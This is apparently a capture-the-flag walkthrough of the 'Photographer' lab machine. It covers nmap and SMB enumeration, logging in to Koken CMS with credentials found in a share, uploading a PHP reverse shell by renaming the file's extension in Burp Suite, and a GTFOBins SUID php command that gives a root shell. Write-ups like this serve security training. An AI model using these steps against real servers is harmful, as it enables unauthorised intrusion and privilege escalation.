# Photographer 1. Started with running a TCP Scan via NMAP ```bash PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 41:4d:aa:18:86:94:8e:88:a7:4c:6b:42:60:76:f1:4f (RSA) | 256 4d:a3:d0:7a:8f:64:ef:82:45:2d:01:13:18:b7:e0:13 (ECDSA) |_ 256 1a:01:7a:4f:cf:95:85:bf:31:a1:4f:15:87:ab:94:e2 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Photographer by v1n1v131r4 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 8000/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-title: daisa ahomi |_http-trane-info: Problem with XML parsing of /evox/about |_http-generator: Koken 0.22.24 |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-open-proxy: Proxy might be redirecting requests Service Info: Host: PHOTOGRAPHER; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required |_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: 0s | smb2-time: | date: 2025-10-29T14:06:00 |_ start_date: N/A | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: photographer | NetBIOS computer name: PHOTOGRAPHER\x00 | Domain name: \x00 | FQDN: photographer |_ System time: 2025-10-29T10:06:00-04:00 |_nbstat: NetBIOS name: PHOTOGRAPHER, NetBIOS user: , NetBIOS MAC: (unknown) | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.35 seconds ``` 2. SMB was running on the server hence I used smbclient to enumerate the network shares present.
3. Enumerated the `sambashare` network share and found the following files
4. Read the contents of `mailsent.txt` and found the following
5. Here I could find two email addresses and what seemed like a secret key at the end of the file. 6. Next, I enumerated the ports and as revealed in the TCP scan, Koken CMS was running on port 80. 7. I looked up online for exploits of Koken and found a file-upload vulnerability of the same version as was running on the target. 8. As it was an authenticated vulnerability I had to get the admin panel and the login credentials first. Hence I ran a directory scan using gobuster. 9. I found a `/admin` subdirectory and found the following login page
10. I used the `daisy@photographer.com` email address from the `mailsent.txt` file and used `babygirl` as the password as was revealed in the same text file. Then, I was redirected to the following page.
11. After that I used the pentestmonkey PHP reverse shell and added it a file named `monkey.php.jpg` 12. I turned on Burp Suite. 13. I used the Import Content option on the Koken dashboard and uploaded the file. While uploading I captured the request in Burp Suite and modified the request by renaming the reverse shell file `monkey.php.jpg` to `monkey.php`. 14. I resent the request and uploaded the reverse shell.
15. I clicked on the file and visited the link given in the Inspector tab
16. Upon opening the link I was redirected to the following page
17. I started a reverse shell on the attacker device. 18. I visited the Download File link given on the webpage to get the location of where the file was being stored and initiate the reverse shell.
19. I found the first flag in `/home/daisa` directory
20. Next, I enumerated the target for privilege escalation and found a `php7.2` binary with sticky bit.
21. I went to the good old GTFObins and looked up exploits for php binary and found the following ``` CMD="/bin/sh" ./php -r "pcntl_exec('/bin/sh', ['-p']);" ``` 22. I used the above commands and got a root shell
24. I found the final root flag inside the `/root` directory